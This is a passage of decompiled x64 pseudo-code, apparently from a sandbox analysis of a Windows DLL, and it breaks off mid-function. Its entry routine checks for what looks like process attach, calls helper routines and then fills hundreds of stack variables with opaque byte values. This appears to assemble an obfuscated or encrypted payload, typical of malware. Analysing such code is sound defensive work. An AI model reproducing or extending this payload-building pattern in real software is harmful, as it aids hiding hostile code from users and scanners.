                                                                                                        				char _v2613;
                                                                                                        				char _v2614;
                                                                                                        				char _v2615;
                                                                                                        				char _v2616;
                                                                                                        				char _v2617;
                                                                                                        				char _v2618;
                                                                                                        				char _v2619;
                                                                                                        				char _v2620;
                                                                                                        				char _v2621;
                                                                                                        				char _v2622;
                                                                                                        				char _v2623;
                                                                                                        				char _v2624;
                                                                                                        				char _v2625;
                                                                                                        				char _v2626;
                                                                                                        				char _v2627;
                                                                                                        				char _v2628;
                                                                                                        				char _v2629;
                                                                                                        				char _v2630;
                                                                                                        				char _v2631;
                                                                                                        				char _v2632;
                                                                                                        				char _v2672;
                                                                                                        				char _v2704;
                                                                                                        				void* _v2736;
                                                                                                        				char _v2752;
                                                                                                        				signed long long _v2760;
                                                                                                        				long long _v2768;
                                                                                                        				char _v2776;
                                                                                                        				signed int _v2780;
                                                                                                        				intOrPtr _v2784;
                                                                                                        				signed long long _v2792;
                                                                                                        				signed char _v2796;
                                                                                                        				signed char _v2800;
                                                                                                        				signed char _v2804;
                                                                                                        				signed char _v2808;
                                                                                                        				signed int _t2669;
                                                                                                        				signed long long _t2714;
                                                                                                        				signed long long _t2715;
                                                                                                        				long long _t2716;
                                                                                                        				signed long long _t2748;
                                                                                                        
                                                                                                        				_t2746 = __rdi;
                                                                                                        				_t2703 = __edi;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __edx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_t2714 =  *0x2897e008; // 0xf9c171536c9e
                                                                                                        				_t2715 = _t2714 ^ _t2748;
                                                                                                        				_v24 = _t2715;
                                                                                                        				_v2784 = _a16;
                                                                                                        				if (_v2784 == 1) goto 0x28913fee;
                                                                                                        				goto 0x289193e5;
                                                                                                        				_v2796 = 0;
                                                                                                        				_v2800 = 0;
                                                                                                        				_v2768 = 0;
                                                                                                        				_v2792 = 0;
                                                                                                        				E00007FFC7FFC289097DC(_a16, __rcx); // executed
                                                                                                        				_v2792 = _t2715;
                                                                                                        				if (_v2792 == 0) goto 0x28914039;
                                                                                                        				r8d = 0x5f5e100;
                                                                                                        				E00007FFC7FFC28906920(0x5f5e100, 0, __edi, __esp, _v2792, __rdx, __rdi, __r8);
                                                                                                        				E00007FFC7FFC289093A8(_t2715, __rbx, _v2792, __rsi); // executed
                                                                                                        				 *0x2897ea20 = 0;
                                                                                                        				 *0x2897ea14 = 0;
                                                                                                        				 *0x2897ea24 = 0;
                                                                                                        				 *0x2897ea18 = 0;
                                                                                                        				 *0x2897ea1c = 0;
                                                                                                        				 *0x2897ea10 = 0;
                                                                                                        				_v2632 = 0x62;
                                                                                                        				_v2631 = 0xfa;
                                                                                                        				_v2630 = 0x28;
                                                                                                        				_v2629 = 0x18;
                                                                                                        				_v2628 = 0x56;
                                                                                                        				_v2627 = 0x18;
                                                                                                        				_v2626 = 0x3d;
                                                                                                        				_v2625 = 0x31;
                                                                                                        				_v2624 = 0x39;
                                                                                                        				_v2623 = 0x13;
                                                                                                        				_v2622 = 0x33;
                                                                                                        				_v2621 = 9;
                                                                                                        				_v2620 = 5;
                                                                                                        				_v2619 = 0x64;
                                                                                                        				_v2618 = 0x18;
                                                                                                        				_v2617 = 0x2d;
                                                                                                        				_v2616 = 0x39;
                                                                                                        				_v2615 = 0x32;
                                                                                                        				_v2614 = 0xae;
                                                                                                        				_v2613 = 0x33;
                                                                                                        				_v2612 = 2;
                                                                                                        				_v2611 = 0xdc;
                                                                                                        				_v2610 = 0xf;
                                                                                                        				_v2609 = 0xd9;
                                                                                                        				_v2608 = 0x8a;
                                                                                                        				_v2607 = 0x2c;
                                                                                                        				_v2606 = 0x45;
                                                                                                        				_v2605 = 0x26;
                                                                                                        				_v2604 = 0x3c;
                                                                                                        				_v2603 = 0x60;
                                                                                                        				_v2602 = 0x69;
                                                                                                        				_v2601 = 0xdb;
                                                                                                        				_v2600 = 0x9e;
                                                                                                        				_v2599 = 0x2e;
                                                                                                        				_v2598 = 0xd5;
                                                                                                        				_v2597 = 0x26;
                                                                                                        				_v2596 = 0x26;
                                                                                                        				_v2595 = 0x30;
                                                                                                        				_v2594 = 0x3f;
                                                                                                        				_v2593 = 0x22;
                                                                                                        				_v2592 = 0xe6;
                                                                                                        				_v2591 = 0xce;
                                                                                                        				_v2590 = 0x3c;
                                                                                                        				_v2589 = 0xe6;
                                                                                                        				_v2588 = 0x4c;
                                                                                                        				_v2587 = 0xd5;
                                                                                                        				_v2586 = 0xb9;
                                                                                                        				_v2585 = 0x39;
                                                                                                        				_v2584 = 0xef;
                                                                                                        				_v2583 = 0xdb;
                                                                                                        				_v2582 = 0x81;
                                                                                                        				_v2581 = 0x12;
                                                                                                        				_v2580 = 0xc4;
                                                                                                        				_v2579 = 0xb;
                                                                                                        				_v2578 = 0xd7;
                                                                                                        				_v2577 = 0x22;
                                                                                                        				_v2576 = 0xdb;
                                                                                                        				_v2575 = 2;
                                                                                                        				_v2574 = 0xb8;
                                                                                                        				_v2573 = 0x15;
                                                                                                        				_v2572 = 0xa8;
                                                                                                        				_v2571 = 2;
                                                                                                        				_v2570 = 0x48;
                                                                                                        				_v2569 = 0xb;
                                                                                                        				_v2568 = 0x36;
                                                                                                        				_v2567 = 0xaa;
                                                                                                        				_v2566 = 0x3a;
                                                                                                        				_v2565 = 0xde;
                                                                                                        				_v2564 = 0x30;
                                                                                                        				_v2563 = 0xcf;
                                                                                                        				_v2562 = 0x15;
                                                                                                        				_v2561 = 0xca;
                                                                                                        				_v2560 = 0x30;
                                                                                                        				_v2559 = 0xcc;
                                                                                                        				_v2558 = 0x6b;
                                                                                                        				_v2557 = 0xae;
                                                                                                        				_v2556 = 0x69;
                                                                                                        				_v2555 = 0xd3;
                                                                                                        				_v2554 = 0x5a;
                                                                                                        				_v2553 = 0xb1;
                                                                                                        				_v2552 = 0x27;
                                                                                                        				_v2551 = 0xe4;
                                                                                                        				_v2550 = 0x28;
                                                                                                        				_v2549 = 0xf6;
                                                                                                        				_v2548 = 0x19;
                                                                                                        				_v2547 = 0xb6;
                                                                                                        				_v2546 = 0xf;
                                                                                                        				_v2545 = 0x65;
                                                                                                        				_v2544 = 0x7b;
                                                                                                        				_v2543 = 0xf9;
                                                                                                        				_v2542 = 0xa;
                                                                                                        				_v2541 = 0x3d;
                                                                                                        				_v2540 = 0x71;
                                                                                                        				_v2539 = 0x89;
                                                                                                        				_v2538 = 0x4e;
                                                                                                        				_v2537 = 0x57;
                                                                                                        				_v2536 = 0x40;
                                                                                                        				_v2535 = 0xfb;
                                                                                                        				_v2534 = 0x1b;
                                                                                                        				_v2533 = 0xf1;
                                                                                                        				_v2532 = 0x1c;
                                                                                                        				_v2531 = 0x67;
                                                                                                        				_v2530 = 0;
                                                                                                        				_v2529 = 0x52;
                                                                                                        				_v2528 = 0xa0;
                                                                                                        				_v2527 = 0xd;
                                                                                                        				_v2526 = 0x90;
                                                                                                        				_v2525 = 0x40;
                                                                                                        				_v2524 = 0x4e;
                                                                                                        				_v2523 = 0;
                                                                                                        				_v2522 = 0x6e;
                                                                                                        				_v2521 = 0xbd;
                                                                                                        				_v2520 = 0x66;
                                                                                                        				_v2519 = 0x9b;
                                                                                                        				_v2518 = 0x15;
                                                                                                        				_v2517 = 0x74;
                                                                                                        				_v2516 = 0x75;
                                                                                                        				_v2515 = 0x58;
                                                                                                        				_v2514 = 0xa1;
                                                                                                        				_v2513 = 0x31;
                                                                                                        				_v2512 = 0x8c;
                                                                                                        				_v2511 = 8;
                                                                                                        				_v2510 = 0x3c;
                                                                                                        				_v2509 = 0x41;
                                                                                                        				_v2508 = 0x5a;
                                                                                                        				_v2507 = 0xf8;
                                                                                                        				_v2506 = 0x1c;
                                                                                                        				_v2505 = 0xa7;
                                                                                                        				_v2504 = 1;
                                                                                                        				_v2503 = 0x4d;
                                                                                                        				_v2502 = 0x4a;
                                                                                                        				_v2501 = 0x55;
                                                                                                        				_v2500 = 0xf8;
                                                                                                        				_v2499 = 0xef;
                                                                                                        				_v2498 = 0xd5;
                                                                                                        				_v2497 = 0x3f;
                                                                                                        				_v2496 = 0x70;
                                                                                                        				_v2495 = 0x6f;
                                                                                                        				_v2494 = 0x7a;
                                                                                                        				_v2493 = 0x59;
                                                                                                        				_v2492 = 0x65;
                                                                                                        				_v2491 = 0x4f;
                                                                                                        				_v2490 = 0xb5;
                                                                                                        				_v2489 = 0xe1;
                                                                                                        				_v2488 = 0x80;
                                                                                                        				_v2487 = 0x5e;
                                                                                                        				_v2486 = 0x4d;
                                                                                                        				_v2485 = 0x6e;
                                                                                                        				_v2484 = 0x17;
                                                                                                        				_v2483 = 0xa9;
                                                                                                        				_v2482 = 0x16;
                                                                                                        				_v2481 = 0x43;
                                                                                                        				_v2480 = 0;
                                                                                                        				_v2479 = 0x1c;
                                                                                                        				_v2478 = 0x4a;
                                                                                                        				_v2477 = 0x2f;
                                                                                                        				_v2476 = 8;
                                                                                                        				_v2475 = 0xa9;
                                                                                                        				_v2474 = 0x3e;
                                                                                                        				_v2473 = 7;
                                                                                                        				_v2472 = 0x13;
                                                                                                        				_v2471 = 0x6a;
                                                                                                        				_v2470 = 0x1d;
                                                                                                        				_v2469 = 0x25;
                                                                                                        				_v2468 = 0x2a;
                                                                                                        				_v2467 = 0xa1;
                                                                                                        				_v2466 = 0x30;
                                                                                                        				_v2465 = 0x60;
                                                                                                        				_v2464 = 0x76;
                                                                                                        				_v2463 = 0x5d;
                                                                                                        				_v2462 = 0x57;
                                                                                                        				_v2461 = 0x23;
                                                                                                        				_v2460 = 0x7e;
                                                                                                        				_v2459 = 0x9e;
                                                                                                        				_v2458 = 0x2f;
                                                                                                        				_v2457 = 0x49;
                                                                                                        				_v2456 = 0x75;
                                                                                                        				_v2455 = 0x70;
                                                                                                        				_v2454 = 0x3c;
                                                                                                        				_v2453 = 0x4d;
                                                                                                        				_v2452 = 0x1e;
                                                                                                        				_v2451 = 0xaa;
                                                                                                        				_v2450 = 0x7b;
                                                                                                        				_v2449 = 0x54;
                                                                                                        				_v2448 = 0x53;
                                                                                                        				_v2447 = 0x5c;
                                                                                                        				_v2446 = 0x54;
                                                                                                        				_v2445 = 0x6c;
                                                                                                        				_v2444 = 0x6b;
                                                                                                        				_v2443 = 0xb4;
                                                                                                        				_v2442 = 0x20;
                                                                                                        				_v2441 = 0x18;
                                                                                                        				_v2440 = 0x1e;
                                                                                                        				_v2439 = 0x21;
                                                                                                        				_v2438 = 2;
                                                                                                        				_v2437 = 8;
                                                                                                        				_v2436 = 0xd;
                                                                                                        				_v2435 = 0x95;
                                                                                                        				_v2434 = 0x23;
                                                                                                        				_v2433 = 0x6c;
                                                                                                        				_v2432 = 8;
                                                                                                        				_v2431 = 0x73;
                                                                                                        				_v2430 = 0x27;
                                                                                                        				_v2429 = 0x1e;
                                                                                                        				_v2428 = 0x1a;
                                                                                                        				_v2427 = 0xbd;
                                                                                                        				_v2426 = 0x67;
                                                                                                        				_v2425 = 0x7b;
                                                                                                        				_v2424 = 0x7a;
                                                                                                        				_v2423 = 1;
                                                                                                        				_v2422 = 0x26;
                                                                                                        				_v2421 = 0x34;
                                                                                                        				_v2420 = 0x36;
                                                                                                        				_v2419 = 0xb3;
                                                                                                        				_v2418 = 0;
                                                                                                        				_v2417 = 2;
                                                                                                        				_v2416 = 0x5c;
                                                                                                        				_v2415 = 0x57;
                                                                                                        				_v2414 = 0x35;
                                                                                                        				_v2413 = 0x4b;
                                                                                                        				_v2412 = 0x3c;
                                                                                                        				_v2411 = 0xd;
                                                                                                        				_v2410 = 0xaa;
                                                                                                        				_v2409 = 9;
                                                                                                        				_v2408 = 2;
                                                                                                        				_v2407 = 0x31;
                                                                                                        				_v2406 = 0x5c;
                                                                                                        				_v2405 = 0x1e;
                                                                                                        				_v2404 = 0xaa;
                                                                                                        				_v2403 = 0x7a;
                                                                                                        				_v2402 = 0xe8;
                                                                                                        				_v2401 = 0x29;
                                                                                                        				_v2400 = 0x45;
                                                                                                        				_v2399 = 0x40;
                                                                                                        				_v2398 = 0x73;
                                                                                                        				_v2397 = 0xed;
                                                                                                        				_v2396 = 0x36;
                                                                                                        				_v2395 = 0xf8;
                                                                                                        				_v2394 = 0x54;
                                                                                                        				_v2393 = 0x17;
                                                                                                        				_v2392 = 0x23;
                                                                                                        				_v2391 = 0x1d;
                                                                                                        				_v2390 = 0xa0;
                                                                                                        				_v2389 = 0x2b;
                                                                                                        				_v2388 = 0xf2;
                                                                                                        				_v2387 = 0x13;
                                                                                                        				_v2386 = 0x3a;
                                                                                                        				_v2385 = 0x25;
                                                                                                        				_v2384 = 0x46;
                                                                                                        				_v2383 = 0x89;
                                                                                                        				_v2382 = 0x29;
                                                                                                        				_v2381 = 0xca;
                                                                                                        				_v2380 = 0xe;
                                                                                                        				_v2379 = 0x4a;
                                                                                                        				_v2378 = 0x30;
                                                                                                        				_v2377 = 0x48;
                                                                                                        				_v2376 = 0xb3;
                                                                                                        				_v2375 = 2;
                                                                                                        				_v2374 = 0xf0;
                                                                                                        				_v2373 = 0x25;
                                                                                                        				_v2372 = 0x15;
                                                                                                        				_v2371 = 0x27;
                                                                                                        				_v2370 = 0x4e;
                                                                                                        				_v2369 = 0xfb;
                                                                                                        				_v2368 = 0x61;
                                                                                                        				_v2367 = 0x7e;
                                                                                                        				_v2366 = 0x57;
                                                                                                        				_v2365 = 0x1e;
                                                                                                        				_v2364 = 0xe;
                                                                                                        				_v2363 = 0x19;
                                                                                                        				_v2362 = 3;
                                                                                                        				_v2361 = 0xe1;
                                                                                                        				_v2360 = 0x11;
                                                                                                        				_v2359 = 0x1b;
                                                                                                        				_v2358 = 6;
                                                                                                        				_v2357 = 0xc;
                                                                                                        				_v2356 = 0x4b;
                                                                                                        				_v2355 = 0x19;
                                                                                                        				_v2354 = 0x19;
                                                                                                        				_v2353 = 0xee;
                                                                                                        				_v2352 = 0x71;
                                                                                                        				_v2351 = 0x24;
                                                                                                        				_v2350 = 0x5a;
                                                                                                        				_v2349 = 0x16;
                                                                                                        				_v2348 = 0x37;
                                                                                                        				_v2347 = 0x45;
                                                                                                        				_v2346 = 0x2d;
                                                                                                        				_v2345 = 0x8a;
                                                                                                        				_v2344 = 0x2a;
                                                                                                        				_v2343 = 0x43;
                                                                                                        				_v2342 = 0x1a;
                                                                                                        				_v2341 = 0x26;
                                                                                                        				_v2340 = 2;
                                                                                                        				_v2339 = 0x25;
                                                                                                        				_v2338 = 0x19;
                                                                                                        				_v2337 = 0x43;
                                                                                                        				_v2336 = 0x89;
                                                                                                        				_v2335 = 0x28;
                                                                                                        				_v2334 = 0x4a;
                                                                                                        				_v2333 = 2;
                                                                                                        				_v2332 = 0x4d;
                                                                                                        				_v2331 = 0x39;
                                                                                                        				_v2330 = 0xe0;
                                                                                                        				_v2329 = 0x30;
                                                                                                        				_v2328 = 0x63;
                                                                                                        				_v2327 = 0x22;
                                                                                                        				_v2326 = 9;
                                                                                                        				_v2325 = 0xb3;
                                                                                                        				_v2324 = 1;
                                                                                                        				_v2323 = 0xa6;
                                                                                                        				_v2322 = 0x6e;
                                                                                                        				_v2321 = 0x51;
                                                                                                        				_v2320 = 0x36;
                                                                                                        				_v2319 = 0x7e;
                                                                                                        				_v2318 = 0x9e;
                                                                                                        				_v2317 = 0x2e;
                                                                                                        				_v2316 = 0xe9;
                                                                                                        				_v2315 = 0x29;
                                                                                                        				_v2314 = 0x42;
                                                                                                        				_v2313 = 0x13;
                                                                                                        				_v2312 = 0x4a;
                                                                                                        				_v2311 = 0xad;
                                                                                                        				_v2310 = 0x28;
                                                                                                        				_v2309 = 0xb7;
                                                                                                        				_v2308 = 0x1e;
                                                                                                        				_v2307 = 0xc;
                                                                                                        				_v2306 = 0x5d;
                                                                                                        				_v2305 = 0x5c;
                                                                                                        				_v2304 = 0xc7;
                                                                                                        				_v2303 = 0x6f;
                                                                                                        				_v2302 = 0xff;
                                                                                                        				_v2301 = 0xb;
                                                                                                        				_v2300 = 0x52;
                                                                                                        				_v2299 = 0xa;
                                                                                                        				_v2298 = 0x2c;
                                                                                                        				_v2297 = 8;
                                                                                                        				_v2296 = 0xa0;
                                                                                                        				_v2295 = 0x2b;
                                                                                                        				_v2294 = 0xc2;
                                                                                                        				_v2293 = 5;
                                                                                                        				_v2292 = 0x24;
                                                                                                        				_v2291 = 0xb8;
                                                                                                        				_v2290 = 0xe7;
                                                                                                        				_v2289 = 0x49;
                                                                                                        				_v2288 = 0x6c;
                                                                                                        				_v2287 = 0x6e;
                                                                                                        				_v2286 = 0xc3;
                                                                                                        				_v2285 = 0x96;
                                                                                                        				_v2284 = 0x1e;
                                                                                                        				_v2283 = 0xff;
                                                                                                        				_v2282 = 0x2a;
                                                                                                        				_v2281 = 0xf;
                                                                                                        				_v2280 = 0xd3;
                                                                                                        				_v2279 = 0xbe;
                                                                                                        				_v2278 = 0x9c;
                                                                                                        				_v2277 = 0xf1;
                                                                                                        				_v2276 = 0x21;
                                                                                                        				_v2275 = 0x3c;
                                                                                                        				_v2274 = 0x25;
                                                                                                        				_v2273 = 0x16;
                                                                                                        				_v2272 = 0xb4;
                                                                                                        				_v2271 = 0xb1;
                                                                                                        				_v2270 = 0x23;
                                                                                                        				_v2269 = 0xe4;
                                                                                                        				_v2268 = 8;
                                                                                                        				_v2267 = 0xfe;
                                                                                                        				_v2266 = 0x1d;
                                                                                                        				_v2265 = 0xb2;
                                                                                                        				_v2264 = 0x2f;
                                                                                                        				_v2263 = 0xd5;
                                                                                                        				_v2262 = 0xf8;
                                                                                                        				_v2261 = 0x35;
                                                                                                        				_v2260 = 0x7f;
                                                                                                        				_v2259 = 0x31;
                                                                                                        				_v2258 = 0x35;
                                                                                                        				_v2257 = 0x18;
                                                                                                        				_v2256 = 0x2a;
                                                                                                        				_v2255 = 0x3f;
                                                                                                        				_v2254 = 0xe9;
                                                                                                        				_v2253 = 0x70;
                                                                                                        				_v2252 = 0x7a;
                                                                                                        				_v2251 = 0x7d;
                                                                                                        				_v2250 = 0x26;
                                                                                                        				_v2249 = 0xee;
                                                                                                        				_v2248 = 0x2b;
                                                                                                        				_v2247 = 0x4a;
                                                                                                        				_v2246 = 0x2b;
                                                                                                        				_v2245 = 0xc5;
                                                                                                        				_v2244 = 0x15;
                                                                                                        				_v2243 = 0x35;
                                                                                                        				_v2242 = 0x7d;
                                                                                                        				_v2241 = 0xbe;
                                                                                                        				_v2240 = 0x5d;
                                                                                                        				_v2239 = 0xb3;
                                                                                                        				_v2238 = 0xdc;
                                                                                                        				_v2237 = 0x8c;
                                                                                                        				_v2236 = 0x6e;
                                                                                                        				_v2235 = 0xff;
                                                                                                        				_v2234 = 0xb;
                                                                                                        				_v2233 = 0x7c;
                                                                                                        				_v2232 = 0x56;
                                                                                                        				_v2231 = 0x3c;
                                                                                                        				_v2230 = 0xc9;
                                                                                                        				_v2229 = 0x62;
                                                                                                        				_v2228 = 0x18;
                                                                                                        				_v2227 = 0x1d;
                                                                                                        				_v2226 = 0x1f;
                                                                                                        				_v2225 = 0xc;
                                                                                                        				_v2224 = 0x99;
                                                                                                        				_v2223 = 0x23;
                                                                                                        				_v2222 = 0xe4;
                                                                                                        				_v2221 = 9;
                                                                                                        				_v2220 = 2;
                                                                                                        				_v2219 = 0x7d;
                                                                                                        				_v2218 = 0x73;
                                                                                                        				_v2217 = 0xe7;
                                                                                                        				_v2216 = 0x20;
                                                                                                        				_v2215 = 0x8f;
                                                                                                        				_v2214 = 0xb7;
                                                                                                        				_v2213 = 0x2b;
                                                                                                        				_v2212 = 0xd;
                                                                                                        				_v2211 = 0x15;
                                                                                                        				_v2210 = 0xc;
                                                                                                        				_v2209 = 0x2a;
                                                                                                        				_v2208 = 0x7f;
                                                                                                        				_v2207 = 0x64;
                                                                                                        				_v2206 = 0x74;
                                                                                                        				_v2205 = 0xd3;
                                                                                                        				_v2204 = 0x19;
                                                                                                        				_v2203 = 0x4a;
                                                                                                        				_v2202 = 0x47;
                                                                                                        				_v2201 = 0x2f;
                                                                                                        				_v2200 = 0xad;
                                                                                                        				_v2199 = 0xb2;
                                                                                                        				_v2198 = 0;
                                                                                                        				_v2197 = 0xdb;
                                                                                                        				_v2196 = 0x69;
                                                                                                        				_v2195 = 0x6a;
                                                                                                        				_v2194 = 0x5c;
                                                                                                        				_v2193 = 0x26;
                                                                                                        				_v2192 = 0xf7;
                                                                                                        				_v2191 = 0x67;
                                                                                                        				_v2190 = 0x7b;
                                                                                                        				_v2189 = 0x7e;
                                                                                                        				_v2188 = 0x31;
                                                                                                        				_v2187 = 0x74;
                                                                                                        				_v2186 = 0x98;
                                                                                                        				_v2185 = 0x2e;
                                                                                                        				_v2184 = 0xfd;
                                                                                                        				_v2183 = 0;
                                                                                                        				_v2182 = 2;
                                                                                                        				_v2181 = 0x14;
                                                                                                        				_v2180 = 0x69;
                                                                                                        				_v2179 = 0xd7;
                                                                                                        				_v2178 = 0x72;
                                                                                                        				_v2177 = 0xb1;
                                                                                                        				_v2176 = 0xac;
                                                                                                        				_v2175 = 0x29;
                                                                                                        				_v2174 = 0x69;
                                                                                                        				_v2173 = 6;
                                                                                                        				_v2172 = 0x5b;
                                                                                                        				_v2171 = 0x3f;
                                                                                                        				_v2170 = 0x64;
                                                                                                        				_v2169 = 0x6d;
                                                                                                        				_v2168 = 0x77;
                                                                                                        				_v2167 = 0xfd;
                                                                                                        				_v2166 = 0x3b;
                                                                                                        				_v2165 = 0xd;
                                                                                                        				_v2164 = 0x15;
                                                                                                        				_v2163 = 0x41;
                                                                                                        				_v2162 = 0xd5;
                                                                                                        				_v2161 = 0xa6;
                                                                                                        				_v2160 = 0x2c;
                                                                                                        				_v2159 = 0xb1;
                                                                                                        				_v2158 = 0x1b;
                                                                                                        				_v2157 = 0xd5;
                                                                                                        				_v2156 = 0xa9;
                                                                                                        				_v2155 = 0x23;
                                                                                                        				_v2154 = 0x4a;
                                                                                                        				_v2153 = 0x72;
                                                                                                        				_v2152 = 0x72;
                                                                                                        				_v2151 = 0x48;
                                                                                                        				_v2150 = 0x45;
                                                                                                        				_v2149 = 0x25;
                                                                                                        				_v2148 = 6;
                                                                                                        				_v2147 = 0xe7;
                                                                                                        				_v2146 = 0x22;
                                                                                                        				_v2145 = 0x5e;
                                                                                                        				_v2144 = 0x13;
                                                                                                        				_v2143 = 0x13;
                                                                                                        				_v2142 = 0xab;
                                                                                                        				_v2141 = 0x39;
                                                                                                        				_v2140 = 0xb7;
                                                                                                        				_v2139 = 0x1d;
                                                                                                        				_v2138 = 0x55;
                                                                                                        				_v2137 = 0xb4;
                                                                                                        				_v2136 = 0xc;
                                                                                                        				_v2135 = 0xaf;
                                                                                                        				_v2134 = 0x78;
                                                                                                        				_v2133 = 1;
                                                                                                        				_v2132 = 0x72;
                                                                                                        				_v2131 = 0x77;
                                                                                                        				_v2130 = 0xd4;
                                                                                                        				_v2129 = 0x3f;
                                                                                                        				_v2128 = 0x49;
                                                                                                        				_v2127 = 0x6d;
                                                                                                        				_v2126 = 0x67;
                                                                                                        				_v2125 = 0xaa;
                                                                                                        				_v2124 = 0xea;
                                                                                                        				_v2123 = 0x22;
                                                                                                        				_v2122 = 0xe6;
                                                                                                        				_v2121 = 0x73;
                                                                                                        				_v2120 = 0x54;
                                                                                                        				_v2119 = 0x5f;
                                                                                                        				_v2118 = 0x61;
                                                                                                        				_v2117 = 0xb8;
                                                                                                        				_v2116 = 0x44;
                                                                                                        				_v2115 = 0xe;
                                                                                                        				_v2114 = 0x1b;
                                                                                                        				_v2113 = 0x21;
                                                                                                        				_v2112 = 0xf;
                                                                                                        				_v2111 = 0x9e;
                                                                                                        				_v2110 = 5;
                                                                                                        				_v2109 = 0xe7;
                                                                                                        				_v2108 = 0x23;
                                                                                                        				_v2107 = 0x4a;
                                                                                                        				_v2106 = 0x7a;
                                                                                                        				_v2105 = 0x2b;
                                                                                                        				_v2104 = 0xc5;
                                                                                                        				_v2103 = 0x1d;
                                                                                                        				_v2102 = 0xdd;
                                                                                                        				_v2101 = 0x89;
                                                                                                        				_v2100 = 0x28;
                                                                                                        				_v2099 = 0x4a;
                                                                                                        				_v2098 = 0x5a;
                                                                                                        				_v2097 = 0x30;
                                                                                                        				_v2096 = 0x5f;
                                                                                                        				_v2095 = 0x35;
                                                                                                        				_v2094 = 0x74;
                                                                                                        				_v2093 = 0xf;
                                                                                                        				_v2092 = 0xd5;
                                                                                                        				_v2091 = 0x32;
                                                                                                        				_v2090 = 0x50;
                                                                                                        				_v2089 = 0x64;
                                                                                                        				_v2088 = 0x67;
                                                                                                        				_v2087 = 0xc3;
                                                                                                        				_v2086 = 0xf0;
                                                                                                        				_v2085 = 0x12;
                                                                                                        				_v2084 = 0xb4;
                                                                                                        				_v2083 = 0x15;
                                                                                                        				_v2082 = 0x4f;
                                                                                                        				_v2081 = 0x5d;
                                                                                                        				_v2080 = 5;
                                                                                                        				_v2079 = 0xab;
                                                                                                        				_v2078 = 0xd0;
                                                                                                        				_v2077 = 0x87;
                                                                                                        				_v2076 = 0x6a;
                                                                                                        				_v2075 = 0x6d;
                                                                                                        				_v2074 = 0x3f;
                                                                                                        				_v2073 = 0x35;
                                                                                                        				_v2072 = 0x5c;
                                                                                                        				_v2071 = 0xe9;
                                                                                                        				_v2070 = 0x7d;
                                                                                                        				_v2069 = 0x89;
                                                                                                        				_v2068 = 0x6e;
                                                                                                        				_v2067 = 0x57;
                                                                                                        				_v2066 = 0x4c;
                                                                                                        				_v2065 = 0x70;
                                                                                                        				_v2064 = 0xd3;
                                                                                                        				_v2063 = 0;
                                                                                                        				_v2062 = 0xbe;
                                                                                                        				_v2061 = 0xa0;
                                                                                                        				_v2060 = 0x2a;
                                                                                                        				_v2059 = 0x76;
                                                                                                        				_v2058 = 0x47;
                                                                                                        				_v2057 = 0x4d;
                                                                                                        				_v2056 = 0x50;
                                                                                                        				_v2055 = 0x20;
                                                                                                        				_v2054 = 0x4e;
                                                                                                        				_v2053 = 0x24;
                                                                                                        				_v2052 = 0xe3;
                                                                                                        				_v2051 = 0x2e;
                                                                                                        				_v2050 = 7;
                                                                                                        				_v2049 = 0x7f;
                                                                                                        				_v2048 = 0x67;
                                                                                                        				_v2047 = 0x8b;
                                                                                                        				_v2046 = 0x92;
                                                                                                        				_v2045 = 0x10;
                                                                                                        				_v2044 = 0xed;
                                                                                                        				_v2043 = 0x38;
                                                                                                        				_v2042 = 0x60;
                                                                                                        				_v2041 = 0x16;
                                                                                                        				_v2040 = 0x74;
                                                                                                        				_v2039 = 0xa8;
                                                                                                        				_v2038 = 0x1f;
                                                                                                        				_v2037 = 0xbf;
                                                                                                        				_v2036 = 0x1c;
                                                                                                        				_v2035 = 0x58;
                                                                                                        				_v2034 = 0xad;
                                                                                                        				_v2033 = 5;
                                                                                                        				_v2032 = 0xaf;
                                                                                                        				_v2031 = 0x11;
                                                                                                        				_v2030 = 0x1b;
                                                                                                        				_v2029 = 0x42;
                                                                                                        				_v2028 = 0x21;
                                                                                                        				_v2027 = 0xb2;
                                                                                                        				_v2026 = 0x3d;
                                                                                                        				_v2025 = 0x67;
                                                                                                        				_v2024 = 0xee;
                                                                                                        				_v2023 = 0x71;
                                                                                                        				_v2022 = 0x24;
                                                                                                        				_v2021 = 0xa;
                                                                                                        				_v2020 = 0x60;
                                                                                                        				_v2019 = 0x64;
                                                                                                        				_v2018 = 0x2f;
                                                                                                        				_v2017 = 0x5e;
                                                                                                        				_v2016 = 5;
                                                                                                        				_v2015 = 0xe3;
                                                                                                        				_v2014 = 0x33;
                                                                                                        				_v2013 = 0x4a;
                                                                                                        				_v2012 = 0x72;
                                                                                                        				_v2011 = 0x26;
                                                                                                        				_v2010 = 0xb7;
                                                                                                        				_v2009 = 0x85;
                                                                                                        				_v2008 = 0x6d;
                                                                                                        				_v2007 = 0xc5;
                                                                                                        				_v2006 = 0x20;
                                                                                                        				_v2005 = 0x4a;
                                                                                                        				_v2004 = 0x4a;
                                                                                                        				_v2003 = 0x6b;
                                                                                                        				_v2002 = 0xd2;
                                                                                                        				_v2001 = 0x62;
                                                                                                        				_v2000 = 0x50;
                                                                                                        				_v1999 = 0xf;
                                                                                                        				_v1998 = 0x1d;
                                                                                                        				_v1997 = 0x55;
                                                                                                        				_v1996 = 0xb4;
                                                                                                        				_v1995 = 0xc;
                                                                                                        				_v1994 = 0xaf;
                                                                                                        				_v1993 = 0x78;
                                                                                                        				_v1992 = 1;
                                                                                                        				_v1991 = 0x72;
                                                                                                        				_v1990 = 0x73;
                                                                                                        				_v1989 = 0xd4;
                                                                                                        				_v1988 = 0x26;
                                                                                                        				_v1987 = 0x8d;
                                                                                                        				_v1986 = 0x8a;
                                                                                                        				_v1985 = 0x62;
                                                                                                        				_v1984 = 0x71;
                                                                                                        				_v1983 = 0x1f;
                                                                                                        				_v1982 = 0x66;
                                                                                                        				_v1981 = 0x6d;
                                                                                                        				_v1980 = 0x33;
                                                                                                        				_v1979 = 0x70;
                                                                                                        				_v1978 = 0x27;
                                                                                                        				_v1977 = 0xa4;
                                                                                                        				_v1976 = 0x61;
                                                                                                        				_v1975 = 0x24;
                                                                                                        				_v1974 = 0xa;
                                                                                                        				_v1973 = 0x32;
                                                                                                        				_v1972 = 0x9b;
                                                                                                        				_v1971 = 0xe9;
                                                                                                        				_v1970 = 0x12;
                                                                                                        				_v1969 = 0x74;
                                                                                                        				_v1968 = 0xb;
                                                                                                        				_v1967 = 0xd7;
                                                                                                        				_v1966 = 0x61;
                                                                                                        				_v1965 = 0xd6;
                                                                                                        				_v1964 = 2;
                                                                                                        				_v1963 = 0x4e;
                                                                                                        				_v1962 = 0x50;
                                                                                                        				_v1961 = 0x25;
                                                                                                        				_v1960 = 2;
                                                                                                        				_v1959 = 0x55;
